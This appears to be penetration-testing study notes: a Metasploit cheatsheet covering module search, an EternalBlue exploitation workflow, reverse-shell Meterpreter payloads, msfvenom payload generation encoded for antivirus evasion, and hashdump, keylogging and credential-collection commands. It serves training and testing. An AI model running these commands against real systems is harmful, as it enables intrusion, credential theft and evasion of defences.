Metasploit Cheatsheet

Module Structure

<No.> <type>/<os>/<service>/<name>

Example: 794 exploit/windows/ftp/scriptftp_list

Module Types

Type	Description
Auxiliary	Scanning, fuzzing, sniffing, and admin capabilities
Encoders	Ensure payloads are intact to their destination
Exploits	Modules that exploit vulnerabilities for payload delivery
NOPs	Keep payload sizes consistent across exploit attempts
Payloads	Code that runs remotely and calls back to attacker
Plugins	Additional scripts integrated within msfconsole
Post	Wide array of modules to gather information, pivot deeper

Note: Only auxiliary, exploits, and post modules can be used with use <no.> command.

Searching Modules

Basic Search

search <keyword>
search eternalromance

Advanced Search Options

search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux
search type:exploit platform:windows cve:2021 rank:excellent microsoft

Search Keywords

Keyword	Description
`cve`	Modules with matching CVE ID
`type`	Module type (exploit, payload, auxiliary, etc.)
`platform`	Target OS/platform
`rank`	Exploitability rank (excellent, good, normal, etc.)
`port`	Target port number
`author`	Module author
`name`	Module name

Search Options

Option	Description
`-h`	Show help information
`-o <file>`	Output results to CSV file
`-S <string>`	Regex pattern to filter results
`-u`	Use module if there is one result
`-s <column>`	Sort by column (rank, date, name, type, check)
`-r`	Reverse sort order

Module Selection & Usage

Select Module

use <module_number>
use exploit/windows/smb/ms17_010_psexec

View Module Options

show options

Set Required Options

set RHOSTS <target_ip>
set RHOSTS 10.10.10.40
setg LHOST <attacker_ip>    # Global setting
set LPORT 4444

View Payloads

show payloads

Set Payload

set payload windows/meterpreter/reverse_tcp

Execute Exploit

run
exploit

Common Options

Option	Description
`RHOSTS`	Target host(s) - required for most modules
`RHOST`	Single target host
`RPORT`	Target port (TCP)
`LHOST`	Attacker’s IP address (for reverse shells)
`LPORT`	Attacker’s listening port
`PAYLOAD`	Payload to use
`TARGET`	Target OS/architecture

Useful Commands

Command	Description
`help`	Show help menu
`help search`	Search command help
`info <module>`	Detailed module information
`check`	Test if target is vulnerable (if supported)
`sessions`	List active sessions
`sessions -i <id>`	Interact with session
`background`	Background current session
`setg`	Set global option (persists across modules)
`unsetg`	Unset global option

Example Workflow

# Start msfconsole
msfconsole

# Search for exploit
search ms17_010

# Select module
use exploit/windows/smb/ms17_010_psexec

# View options
show options

# Set target
set RHOSTS 10.10.10.40

# Set payload options
setg LHOST 10.10.14.15
set LPORT 4444

# Check vulnerability (if supported)
check

# Run exploit
run

Rank Levels

Rank	Description
excellent	Exploit will never crash the service
great	Exploit has a default target and auto-detects the target
good	Exploit has a default target
normal	Exploit is otherwise reliable
average	Exploit is generally unreliable
low	Exploit is nearly impossible to exploit
manual	Exploit is unstable or difficult to exploit

Targets

Targets are unique operating system identifiers taken from the versions of those specific operating systems which adapt the selected exploit module to run on that particular version.

View Targets

# From root menu (requires exploit selected first)
msf6 > show targets
[-] No exploit module selected.

# From within an exploit module
msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets

Select a Target

msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6
target => 6

Example Target List

Exploit targets:
   Id  Name
   --  ----
   0   Automatic
   1   IE 7 on Windows XP SP3
   2   IE 8 on Windows XP SP3
   3   IE 7 on Windows Vista
   4   IE 8 on Windows Vista
   5   IE 8 on Windows 7
   6   IE 9 on Windows 7

Note: Setting target to Automatic lets msfconsole perform service detection before launching the attack.

Target Identification

To identify a target correctly:

Obtain a copy of the target binaries
Use msfpescan to locate a suitable return address

Payloads (Detailed)

Payloads are modules that aid the exploit module in returning a shell to the attacker.

Payload Types

Notation	Type	Description
`windows/shell_bind_tcp`	Single	No stage, self-contained payload
`windows/shell/bind_tcp`	Staged	Stager (bind_tcp) + Stage (shell)

Singles

Self-contained payloads with exploit and entire shellcode
More stable but larger in size
Result immediately after execution
Example: Adding a user or starting a process

Stagers

Wait on attacker machine for connection
Small and reliable
Set up network connection between attacker and victim
Examples: reverse_tcp, reverse_https, bind_tcp

Stages

Downloaded by stager modules
Provide advanced features with no size limits
Examples: Meterpreter, VNC Injection

List Payloads

msf6 > show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads

Select Payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
# or
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

Common Windows Payloads

Payload	Description
`generic/shell_bind_tcp`	Generic listener, normal shell, TCP bind
`generic/shell_reverse_tcp`	Generic listener, normal shell, reverse TCP
`windows/x64/exec`	Executes an arbitrary command
`windows/x64/shell_reverse_tcp`	Normal shell, single payload, reverse TCP
`windows/x64/shell/reverse_tcp`	Normal shell, stager + stage, reverse TCP
`windows/x64/meterpreter/$`	Meterpreter payload + varieties
`windows/x64/powershell/$`	Interactive PowerShell sessions
`windows/x64/vncinject/$`	VNC Server (Reflective Injection)

Meterpreter Commands

meterpreter > help           # Show all commands
meterpreter > getuid         # Get current user
meterpreter > sysinfo        # System information
meterpreter > shell          # Drop to system shell
meterpreter > hashdump       # Dump SAM database
meterpreter > screenshot     # Capture screenshot
meterpreter > keyscan_start  # Start keylogger
meterpreter > background     # Background session

Encoders

Encoders change payloads to run on different architectures and help with AV evasion.

Supported Architectures

x64, x86, sparc, ppc, mips

List Encoders

msf6 > show encoders

Common Encoders

Encoder	Description
`x86/shikata_ga_nai`	Polymorphic XOR Additive Feedback Encoder
`x64/xor`	XOR Encoder
`x64/zutto_dekiru`	Zutto Dekiru
`x86/alpha_mixed`	Alpha2 Alphanumeric Mixedcase Encoder
`x86/unicode_mixed`	Alpha2 Alphanumeric Unicode Mixedcase Encoder

Generate Encoded Payload with msfvenom

# Single iteration
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o payload.exe

# Multiple iterations (10)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o payload.exe

Check Payload with VirusTotal

msf-virustotal -k <API_key> -f payload.exe

Note: Modern AV/IPS solutions can detect encoded payloads. Multiple encoding iterations alone are often not sufficient for evasion.

Databases

Databases in msfconsole track results, credentials, and scan data using PostgreSQL.

Database Setup

# Check PostgreSQL status
sudo service postgresql status

# Start PostgreSQL
sudo systemctl start postgresql

# Initialize MSF database
sudo msfdb init

# Check database status
sudo msfdb status

Connect to Database

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Reinitialize Database

msf6 > msfdb reinit

Workspaces

msf6 > workspace                    # List workspaces
msf6 > workspace -a Target_1        # Add workspace
msf6 > workspace Target_1           # Switch workspace
msf6 > workspace -d Target_1        # Delete workspace
msf6 > workspace -r old new         # Rename workspace

Import Scan Results

msf6 > db_import Target.xml         # Import Nmap XML

Run Nmap from MSFconsole

msf6 > db_nmap -sV -sS 10.10.10.8

View Stored Data

msf6 > hosts                        # List discovered hosts
msf6 > services                     # List discovered services
msf6 > services -p 445              # Filter by port
msf6 > services -s smb              # Filter by service name
msf6 > vulns                        # List vulnerabilities
msf6 > creds                        # List credentials
msf6 > loot                         # List loot (hashes, etc.)

Hosts Command Options

msf6 > hosts -h
  -a,--add         Add hosts
  -d,--delete      Delete hosts
  -c <col1,col2>   Only show specific columns
  -R,--rhosts      Set RHOSTS from results
  -S,--search      Search string to filter

Services Command Options

msf6 > services -h
  -p <port>        Search by port
  -r <protocol>    Protocol (tcp/udp)
  -s <name>        Service name
  -u,--up          Only show up services
  -R,--rhosts      Set RHOSTS from results

Credentials Management

# Add credentials
msf6 > creds add user:admin password:notpassword realm:workgroup
msf6 > creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
msf6 > creds add user:sshadmin ssh-key:/path/to/id_rsa

# Filter credentials
msf6 > creds -u admin              # By username
msf6 > creds -p 22                 # By port
msf6 > creds -t ntlm               # By type

Export Data

msf6 > services -o services.csv    # Export to CSV
msf6 > creds -o creds.csv          # Export credentials

Sessions

MSFconsole can manage multiple modules simultaneously using Sessions, which create dedicated control interfaces for all deployed modules.

Background a Session

# From Meterpreter - press [CTRL] + [Z] or type:
meterpreter > background

# Session will continue running in background

List Active Sessions

msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MS01  10.10.10.129:443 -> 10.10.10.205:50501

Interact with a Session

msf6 > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Session Commands

Command	Description
`sessions`	List all active sessions
`sessions -i <id>`	Interact with session
`sessions -k <id>`	Kill session
`sessions -K`	Kill all sessions
`sessions -u <id>`	Upgrade shell to Meterpreter
`background`	Background current session
`[CTRL] + [Z]`	Background current session

Using Sessions with Post Modules

Post-exploitation modules can target existing sessions:

# Background current session
meterpreter > background

# Select post module
msf6 > use post/windows/gather/credentials/credential_collector

# Set the session to run against
msf6 post(windows/gather/credentials/credential_collector) > set SESSION 1

# Run the module
msf6 post(windows/gather/credentials/credential_collector) > run

Jobs

Jobs allow running tasks in the background, freeing up the console for other work. This is useful when you need a port for a different module or want to run multiple handlers.

View Jobs Help

msf6 > jobs -h

OPTIONS:
    -K        Terminate all running jobs.
    -P        Persist all running jobs on restart.
    -S <opt>  Row search filter.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate jobs by job ID and/or range.
    -l        List all running jobs.
    -p <opt>  Add persistence to job by job ID
    -v        Print more detailed info.

Run Exploit as Background Job

msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.34:4444

Exploit Command Options

msf6 > exploit -h

OPTIONS:
    -J        Force running in the foreground, even if passive.
    -e <opt>  The payload encoder to use.
    -f        Force the exploit to run regardless of MinimumRank.
    -j        Run in the context of a job.
    -z        Do not interact with the session after successful exploitation.

Job Management Commands

Command	Description
`jobs -l`	List all running jobs
`jobs -i <id>`	Detailed info about job
`jobs -k <id>`	Kill job by ID
`jobs -K`	Kill all jobs
`kill <id>`	Kill job by index number

Example: Running Multiple Handlers

# Start first handler as job
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.34:4444

# Start second handler on different port
msf6 exploit(multi/handler) > set LPORT 4445
msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 10.10.14.34:4445

# List running jobs
msf6 > jobs -l

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.10.14.34:4444
  1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.10.14.34:4445

Note: Don’t use [CTRL] + [C] to stop an exploit using a port - the port will remain in use. Use jobs -k <id> instead to properly free the port.

Keyboard shortcuts

notebook